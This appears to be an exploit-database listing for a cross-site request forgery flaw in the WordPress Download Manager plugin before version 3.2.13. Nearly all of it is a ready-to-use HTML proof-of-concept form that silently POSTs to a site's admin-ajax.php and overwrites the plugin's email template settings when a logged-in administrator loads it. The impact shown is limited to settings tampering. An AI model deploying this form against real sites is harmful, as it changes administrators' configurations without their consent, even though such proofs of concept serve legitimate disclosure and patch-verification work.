Exploit for WordPress Download Manager < 3.2.13 - Email Template Setting Update via CSRF

Name: Exploit for WordPress Download Manager < 3.2.13 - Email Template Setting Update via CSRF
Rating: 5 (367 reviews)

2021-08-09 | CVSS 0.8

## https://sploitus.com/exploit?id=WPEX-ID:115A6FD3-A723-4167-A9A3-379871F13FCB
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" method="POST">
      <input type="hidden" name="__wpdm_email_template" value="default.html" />
      <input type="hidden" name="__wpdm_email_setting[logo]" value="" />
      <input type="hidden" name="__wpdm_email_setting[banner]" value="" />
      <input type="hidden" name="__wpdm_email_setting[footer_text]" value="Changed Via CSRF" />
      <input type="hidden" name="__wpdm_email_setting[facebook]" value="" />
      <input type="hidden" name="__wpdm_email_setting[twitter]" value="" />
      <input type="hidden" name="__wpdm_email_setting[youtube]" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>